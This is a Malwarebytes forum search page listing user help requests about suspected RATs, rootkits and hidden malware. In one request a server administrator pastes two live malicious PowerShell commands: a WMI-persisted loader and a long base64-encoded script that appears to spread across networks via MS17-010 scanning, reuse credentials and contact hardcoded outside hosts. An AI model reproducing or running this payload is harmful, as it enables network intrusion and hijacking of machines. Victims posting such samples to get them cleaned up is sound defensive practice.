Jump to content

Search the Community

Showing results for tags 'hidden'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes for Windows Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • Malwarebytes Privacy
    • Malwarebytes Browser Guard
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Nebula
    • Malwarebytes Nebula Modules
    • Malwarebytes Endpoint Security
    • Other Malwarebytes Business Products
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Location


Interests

Found 16 results

  1. here's the logs you need. i have no idea where i got the RAT from since i didn't download anything sketchy. I did a full system reset with settings to try and get rid of it but apparently they can survive those so i want to get rid of all rootkits/ rats/ hidden malware in my pc. thank you in advance! Addition.txt FRST.txt malwarebytes log.txt
  2. Hi, so one day I was playing Minecraft and almost took a break but somebody was moving my mouse! So I went into airplane mode and scanned around but didn't find anything. I reset my PC with settings and I read that RATs can survive resets so I want to get my system rid of all rootkits and RATs and hidden malware.
  3. Hey Malwarebytes team/forum. Recently I've been receiving notifications from Malwarebytes saying that it has blocked an inbound connection. Great! that means it's doing it's job. Or at least until yesterday when i took an extra moment to see what exactly it was blocking. Upon inspection of the notifications i saw several from the steam gaming platform, and one from Nvidia container. yesterday i tried looking into this blocked connection that was using Nvidia and tried posting to the forum only to be blocked by the forum's spam filter, oh well. so i took it into my own hands and uninstalled Geforce Experience and manually removed the folder containing the Nvidia container inside the Nvidia corporation folder just to be safe since i don't use the features provided by Geforce Experience aside from the FPS overlay, then called it a day. That is until just now when i got another block this time in regards to another inbound connection this time using the program Spotify. now i'm familiar with both steam, nvidia, and spotify as one is my game client, one is my graphics card, and another is my music program. What concerns me is that the inbound connections are not associated with any site or host-name, only IP address. so i googled the IP address and a few results came back with china (minus one from a data center in Canada). each notification lists the program behind these inbound connections and the files location, all back to the actual programs .exe's. Bummer i was hoping for an easy uninstall of some fake programs. so after some digging i found that this time (the block using Spotify) the file location was located inside "WindowsApp" folder (which is permission blocked by "trustedInstaller" a default outdated windows process[from my understanding]). This concerns me even more and i really don't want to try gaining access only to accidentally break something. So now convinced that i in fact do have a Trojan and it is attempting to receive network communication via legitimate applications i have come to this forum in search of more professional help. Once the malwarebytes scan is finished i will attach the result of the malwarebytes scan, the Adware cleaner scan, the Frst.txt / Addition.txt, and the Notifications (in .txt) from malwarebytes. Then i wil submit this post and hope that the weirdness yesterday with the forums spam filter is done. FRST.txt Addition.txt AdwCleaner[S24].txt scan export.txt notifcation.txt notifcation(1).txt notifcation(2).txt notifcation(3).txt notifcation(4).txt notifcation(5).txt notifcation(6).txt
  4. A few days ago I restarted my computer before a long time without re-starting it (like 1 week with the pc on) and I noticed that "Explorer.exe" was requesting to initialize, but the real explorer.exe task was already running... I said no but then I checked the directory of the file and the system said that the file was on %windir%/resources/themes, well going into folder to check if the file exists I noticed that theres nothing more than aero themes in this folder. So did a scan in the folder using malwarebytes and it recognized svchost.exe malware and explorer.exe, before adding they do quarentine I wanted to check why the files didnt apeared, so I enabled "show hidden folders" in explorer (the real one, from microsoft) and it changed nothing, well, so I tried to open the archive by going with %windir%/resources/themes/explorer.exe in the explorer path, it worked, but I still uncapable of seeing this file... So I started CMD as admin and did " cd " to %windir%/resources/themes and did " dir " inside the folder, as I expected the dir shows the same as explorer, but appeared 2 new items that the was named as " . " and " .. " I deleted both sucessfully. Searching for this in internet I found that there's an other way to hide files in windows, that was adding them to" important system files or protected system files" list, and following the instructions to disable this privilege, I finally could see the archives, well, I added them to the quarentine list and continued using my computer since yesterday that I realized that everytime malwarebytes send two addwares to quarentine (I left the results of scan in the post as "Annoying addware.txt") they come back right after I finish the task... When trying to solve these issues I realized many things... 1- I cant use commands as DISM, sfc /scannow, windows update, windows defender( I will let write happens when i try to use them bellow this part) , net start/stop wuauserv (the wuauserv service doesnt even exists in registry, I didnt checked windows defender one...) 2- there was a folder called QEMU hidden with the "important system files" method, I deleted all content Inside and then deleted the folder after taking out the folder privilegies 3- Theres two "program" files in "Inicialize" section of task manager wich I cant go to proprieties ( I dropped the print down on anexed files named as "Program" unknow files) When I try to use with /checkhealth everything go fine, but when I try to use dism with /restorehealth it stops at 87,5% and gives an error 1060 messages saying " the specified service does not exist as an installed service " ( I left the DISM log file right bellow named as DISM.txt ) When I try to use sfc /scannow it says that cannot fix all issues When i try to use windows update it says that my organizations disable windows updates ( ? ) When I try windows defender it just goes black screen on the window Well, it would be great if someone could help me, I dont really want to re-install windows... I would take a month to setup my pc again Also, I run Windows 10 Pro 64bits, version 1809... dism.log Annoying Adware.txt Rkill.txt FRST.txt Addition.txt
  5. Hello, as described on the "I'm infected" topic (https://forums.malwarebytes.com/topic/9573-im-infected-what-do-i-do-now/) I did all the indications, I now need help to know what to do please. The laptop has been very slow for a long time but I want to clear everything now, basically when I make an analysis with malwarebytes or kaspersky antivirus or any softwares of this kind it doesn't find anything, but I see it: the pc is very very slow and isn't too old, on top of that it has great components (nvidia 740m, intel core i7 etc...) that's why after doing some research on the subject I think it's a rootkit. Using hitman pro too, on a random automatic daily analysis it has managed to found a threat, that I couldn't delete, that neither malwarebytes nor kaspersky found afterwards. Please help, the files asked for in the topic should be uploaded, thank you for your attention I hope the problem can be solved, thank you again. Addition.txt FRST.txt Malwarebytes.txt
  6. Hi, I desperately need help here. I am using Malwarebytes Premium installed on Windows 10 build 1809. Somehow this malware got through and it has been very persistent. Malwarebytes scans do not detect it and even after a system reset, it comes back. I notice that there are folders that should not be there and suspect that the virus has created a virtual drive from which to launch a fake copy of my windows system. The reason why I suspect I am infected is that everytime I click on an application file. I get a pop up with Chinese characters. So far it has been a irritant because it seems to run on a schedule. However, running programs from Desktop seems to bypass the virus for a short period of time. Scanning with both Windows Defender and Malwarebytes reveal nothing an I fear both have been compromised. Running Trend Micro's Anti-Threat Toolkit picked out 14 threats. But even after cleaning nthensustem.after that and rebooting, the malware is still back in force. Please help. Or should I just opt.for the nuclear option and completely format my SSD drive and reinstall Windows from a USB? I have a Lenovo Thinkpad X10 Yoga. Thanks in advance.
  7. So, I came to know about this issue yesterday when I returned from school and used my laptop. All the files and folders except C Drive are hidden and there is shortcut of everything. I click on the shortcut and then I can access the file. But when I try to copy anything from lappi to USB, only shortcuts are being copied. Also, an .exe file is being created on the name of the folder and file. Third, when I tried to show all the system protected files and folders, a junk of files and folders came up on the disk. Don't really know what went wrong. Day before yesterday, I inserted my friend's USB into lappi. I think this might be the reason of this. Any help would be highly appreciated as I have to clean my lappi and don't want to loose any file whatsoever. Thanks, Steve.
  8. Hello I have been having an issue with our server at work recently and cant get to the bottom of it. Two Powershell windows keep opening in the background running a script one of which consuming a lot of CPU power. I can end the task or suspend the process but it always returns. This machine hosts a domain and several users log into this server via remote desktop on the default port 3389 These are the scrips - the first one is the one using 70% of the CPU - the second one always appears first "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Office_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')" powershell.exe -NoP -NonI -W Hidden -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAANAAoAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAZgB1AG4AcwAnAF0ALgBWAGEAbAB1AGUAIAAgACAAIAAgACAAIAAgAA0ACgAkAGQAZQBmAHUAbgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZgB1AG4AcwApACkADQAKAGkAZQB4ACAAJABkAGUAZgB1AG4ADQAKAA0ACgBHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAXwBfAEYAaQBsAHQAZQByAFQAbwBDAG8AbgBzAHUAbQBlAHIAQgBpAG4AZABpAG4AZwAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAcwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGYAaQBsAHQAZQByACAALQBuAG8AdABtAGEAdABjAGgAIAAnAFMAQwBNACAARQB2AGUAbgB0ACAATABvAGcAcwAnAH0AIAB8AFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQADQAKACQAZABpAHIAcABhAHQAaAA9ACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACsAJwBcAHMAeQBzAHQAZQBtADMAMgAnACAAIAAgAA0ACgBpAGYAIAAgACgAIQAoAHQAZQBzAHQALQBwAGEAdABoACAAJABkAGkAcgBwAGEAdABoACAAKQApAHsADQAKAAkAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQADQAKAH0ADQAKAGkAZgAgACgAIQAoAHQAZQBzAHQALQBwAGEAdABoACAAKAAkAGQAaQByAHAAYQB0AGgAKwAnAFwAbQBzAHYAYwBwADEAMgAwAC4AZABsAGwAJwApACkAKQANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADUANQAiACkALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA3ADcANwA3ACIAKQApACAALQBhAG4AZAAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIARQBTAFQAQQBCAEwASQBTAEgARQBEACIAKQApAA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABlAHYAaQBkAD0AJABsAGkAbgBlAFsALQAxAF0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AaQBkACAAJABlAHYAaQBkACAAfAAgAHMAdABvAHAALQBwAHIAbwBjAGUAcwBzACAALQBmAG8AcgBjAGUADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAGkAZgAgACgAIQAkAGUAeABpAHMAdAAgAC0AYQBuAGQAIAAoACQAcABzAGkAZABzAC4AYwBvAHUAbgB0ACAALQBsAGUAIAA4ACkAKQANAAoAewAgACAAIAANAAoAIAAgACAAIAAkAGMAbQBkAG0AbwBuAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBOAG8AUAAgAC0ATgBvAG4ASQAgAC0AVwAgAEgAaQBkAGQAZQBuACAAYAAiAGAAJABtAG8AbgAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoATwBmAGYAaQBjAGUAXwBVAHAAZABhAHQAZQByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG0AbwBuACcAXQAuAFYAYQBsAHUAZQA7AGAAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAZgB1AG4AcwAnAF0ALgBWAGEAbAB1AGUAIAA7AGkAZQB4ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABgACQAZgB1AG4AcwApACkAKQA7AEkAbgB2AG8AawBlAC0AQwBvAG0AbQBhAG4AZAAgACAALQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIABgACQAUgBlAG0AbwB0AGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAEAAKABgACQAbQBvAG4ALAAgAGAAJABtAG8AbgAsACAAJwBWAG8AaQBkACcALAAgADAALAAgACcAJwAsACAAJwAnACkAYAAiACIADQAKACAAIAAgACAAJAB2AGIAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBDAG8AbQBPAGIAagBlAGMAdAAgAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwADQAKAAkAJAB2AGIAcwAuAHIAdQBuACgAJABjAG0AZABtAG8AbgAsADAAKQAgACAADQAKAH0ADQAKAA0ACgAkAE4AVABMAE0APQAkAEYAYQBsAHMAZQANAAoAJABtAGkAbQBpACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBpAG0AaQAnAF0ALgBWAGEAbAB1AGUAIAANAAoAJABhACwAIAAkAE4AVABMAE0APQAgAEcAZQB0AC0AYwByAGUAZABzACAAJABtAGkAbQBpACAAJABtAGkAbQBpAA0ACgAgACAAIAAgACAAIAAgAA0ACgAkAE4AZQB0AHcAbwByAGsAcwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATgBlAHQAdwBvAHIAawBBAGQAYQBwAHQAZQByAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AIAAtAEUAQQAgAFMAdABvAHAAIAB8ACAAPwAgAHsAJABfAC4ASQBQAEUAbgBhAGIAbABlAGQAfQAgACAAIAAgAA0ACgAkAGkAcABzAHUAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AE8AZgBmAGkAYwBlAF8AVQBwAGQAYQB0AGUAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpAHAAcwB1ACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGkAMQA3ACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAaQAxADcAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAHMAYwBiAGEAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAcwBjACcAXQAuAFYAYQBsAHUAZQANAAoAWwBiAHkAdABlAFsAXQBdACQAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBjAGIAYQApACAAIAAgACAAIAANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABOAGUAdAB3AG8AcgBrACAAaQBuACAAJABOAGUAdAB3AG8AcgBrAHMAKQAgAA0ACgB7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgAA0ACgAgACAAIAAgACQASQBQAEEAZABkAHIAZQBzAHMAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAHAAQQBkAGQAcgBlAHMAcwBbADAAXQAgACAADQAKAAkAaQBmACAAKAAkAEkAUABBAGQAZAByAGUAcwBzACAALQBtAGEAdABjAGgAIAAnAF4AMQA2ADkALgAyADUANAAnACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgAAkADQAKACAAIAAgACAAJABTAHUAYgBuAGUAdABNAGEAcwBrACAAIAA9ACAAJABOAGUAdAB3AG8AcgBrAC4ASQBQAFMAdQBiAG4AZQB0AFsAMABdACAAIAANAAoAIAAgACAAIAAkAGkAcABzAD0ARwBlAHQALQBOAGUAdAB3AG8AcgBrAFIAYQBuAGcAZQAgACQASQBQAEEAZABkAHIAZQBzAHMAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsADQAKAAkAJAB0AGMAcABjAG8AbgBuACAAPQAgAG4AZQB0AHMAdABhAHQAIAAtAGEAbgBvAHAAIAB0AGMAcAAgAA0ACgAJAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoACQAJAGkAZgAgACgAJABsAGkAbgBlAC4AYwBvAHUAbgB0ACAALQBsAGUAIAA0ACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoACQAJACQAaQA9ACQAbABpAG4AZQBbAC0AMwBdAC4AcwBwAGwAaQB0ACgAJwA6ACcAKQBbADAAXQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIAAoACQAbABpAG4AZQBbAC0AMgBdACAALQBlAHEAIAAnAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAnACkAIAAtAGEAbgBkACAAIAAoACQAaQAgAC0AbgBlACAAJwAxADIANwAuADAALgAwAC4AMQAnACkAIAAtAGEAbgBkACAAKAAkAGkAcABzACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAKQApAA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABpAHAAcwArAD0AJABpAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGkAZgAgACgAKABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAAtACQAcwB0AGkAbQBlACkALwAxADAAMAAwACAALQBnAHQAIAA1ADQAMAAwACkAewBiAHIAZQBhAGsAfQANAAoACQAkAHMAZQA9AEAAKAAnADEAMAA3AC4AMQA3ADkALgA2ADcALgAyADQAMwAnACwAJwAxADcAMgAuADIANAA3AC4AMQAxADYALgA4ACcAKQANAAoACQAkAG4AaQBjAD0AJwAxADEAOAAuADEAOAA0AC4ANAA4AC4AOQA1ACcADQAKAAkAZgBvAHIAZQBhAGMAaAAoACQAdAAgAGkAbgAgACQAcwBlACkADQAKAAkAewANAAoACQAJACQAcABpAG4APQB0AGUAcwB0AC0AYwBvAG4AbgBlAGMAdABpAG8AbgAgACQAdAANAAoACQAJAGkAZgAgACgAJABwAGkAbgAgAC0AbgBlACAAJABuAHUAbABsACkADQAKAAkACQB7AA0ACgAJAAkACQAkAG4AaQBjAD0AJAB0AA0ACgAJAAkACQBiAHIAZQBhAGsADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAJABuAGkAYwA9ACQAbgBpAGMAKwAiADoAOAAwADAAMAAiAA0ACgANAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAGkAcAAgAGkAbgAgACQAaQBwAHMAKQANAAoAIAAgACAAIAB7ACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGkAcAAgAC0AZQBxACAAJABJAFAAQQBkAGQAcgBlAHMAcwApAHsAYwBvAG4AdABpAG4AdQBlAH0AIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoAFQAZQBzAHQALQBDAG8AbgBuAGUAYwB0AGkAbwBuACAAJABpAHAAIAAtAGMAbwB1AG4AdAAgADEAKQAgAC0AbgBlACAAJABuAHUAbABsACAAIAAtAGEAbgBkACAAJABpAHAAcwB1ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApACAADQAKACAAIAAgACAAIAAgACAAIAB7ACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHIAZQA9ADAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABhAC4AYwBvAHUAbgB0ACAALQBuAGUAIAAwACkAIAAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsAJAByAGUAIAA9ACAAdABlAHMAdAAtAGkAcAAgAC0AaQBwACAAJABpAHAAIAAtAGMAcgBlAGQAcwAgACQAYQAgACAALQBuAGkAYwAgACQAbgBpAGMAIAAtAG4AdABsAG0AIAAkAE4AVABMAE0AIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAcgBlACAALQBlAHEAIAAxACkAewAkAGkAcABzAHUAIAA9ACQAaQBwAHMAdQAgACsAIgAgACIAKwAkAGkAcAB9AA0ACgAJAAkACQBlAGwAcwBlAA0ACgAJAAkACQB7AA0ACgAJAAkACQAJACQAdgB1AGwAPQBbAFAAaQBuAGcAQwBhAHMAdABsAGUALgBTAGMAYQBuAG4AZQByAHMALgBtADEANwBzAGMAXQA6ADoAUwBjAGEAbgAoACQAaQBwACkACQAJAAkACQANAAoACQAJAAkACQBpAGYAIAAoACQAdgB1AGwAIAAtAGEAbgBkACAAJABpADEANwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpAHAAKQANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA== Addition.txt FRST.txt mb.txt AdwCleaner[S1].txt MyConsoleSettings.txt MyScheduledTasks.txt
